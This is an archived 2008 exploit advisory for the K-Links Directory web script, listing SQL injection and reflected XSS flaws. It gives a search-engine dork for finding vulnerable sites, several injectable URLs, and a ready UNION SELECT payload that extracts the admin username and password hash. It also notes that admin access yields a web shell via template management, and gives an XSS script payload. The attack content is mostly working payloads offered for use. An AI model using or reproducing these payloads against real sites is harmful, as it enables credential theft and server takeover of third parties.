K-Links Directory (SQL/XSS) Multiple Remote Vulnerabilities

2008.08.13
Credit: Corwin
Risk: High
Local: No
Remote: Yes
CWE: CWE-89
CWE-79

================================================================================ || K-Links Directory SQL-INJECTION, XSS ================================================================================ Application: K-Links Directory ------------ Website: http://turn-k.net/k-links -------- Version: Platinum (All) -------- About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$. ------ Googledork: Powered By K-Links Directory ----------- Demo: http://klinksdemo.com ----- [ SQL-INJECTION ] http://host/report/-1[SQL] http://host/visit.php?id=-1[SQL] http://host/addreview/-1[SQL] http://host/refer/-1[SQL] ===>>> Exploit: http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8 from platinum_admins where a_id=1/* /* Admin Login - http://host/admin Manage Templates => web-shell */ [ PASSIVE XSS :) ] http://host/index.php?req=login&redirect=&login_message=<script>alert()</script> Author: Corwin ------- Contact: corwin88[dog]mail[dot]ru --------

Referencje:

http://xforce.iss.net/xforce/xfdb/44160
http://www.milw0rm.com/exploits/6192


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top